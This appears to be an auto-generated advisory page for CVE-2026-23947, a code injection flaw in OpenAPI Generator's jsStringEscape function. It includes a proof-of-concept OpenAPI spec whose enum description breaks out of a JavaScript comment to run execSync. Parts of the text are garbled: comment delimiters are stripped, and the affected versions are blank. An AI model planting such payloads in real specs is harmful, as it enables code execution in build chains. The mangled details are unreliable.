OpenAPI Generator, Code Injection via Incomplete Fix, CVE-2026-23947 (Critical)

Listen to this Post

This CVE exploits an incomplete sanitization fix in OpenAPI Generator’s `jsStringEscape` function. The function correctly escapes quotes but fails to sanitize asterisk () and forward slash (/) characters. When generating client-side JavaScript code from an OpenAPI specification, user-controllable data within enum descriptions is placed inside JavaScript comment blocks. An attacker can inject a `/` sequence to break out of the comment, followed by arbitrary JavaScript code. This malicious payload is then written directly into the generated output files, leading to Remote Code Execution when the generated code is executed.
Platform: OpenAPI Generator
Version: Affects versions
Vulnerability: Code Injection
Severity: Critical
Date: 2026-01-31

Prediction: 2026-02-14

What Undercode Say:

Analytics:

`grep -r “jsStringEscape” .`

`find . -name “.mustache” -exec grep -l “enum” {} \;`

`npm list -g openapi-generator-cli`

`openapi-generator-cli version`

How Exploit:

openapi: 3.0.4

info:

Exploit

components:

schemas:

Evil:

type: string

enum:

  • PWNED

x-enumDescriptions:

  • “pwned / }; require(‘child_process’).execSync(‘calc’); const a = { /”

Protection from this CVE:

Sanitize and /

Update generator version

Validate OpenAPI specs

Escape JS comment delimiters

Impact:

Remote Code Execution

Client-Side Compromise

Data Breach Potential

Build Chain Attack

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top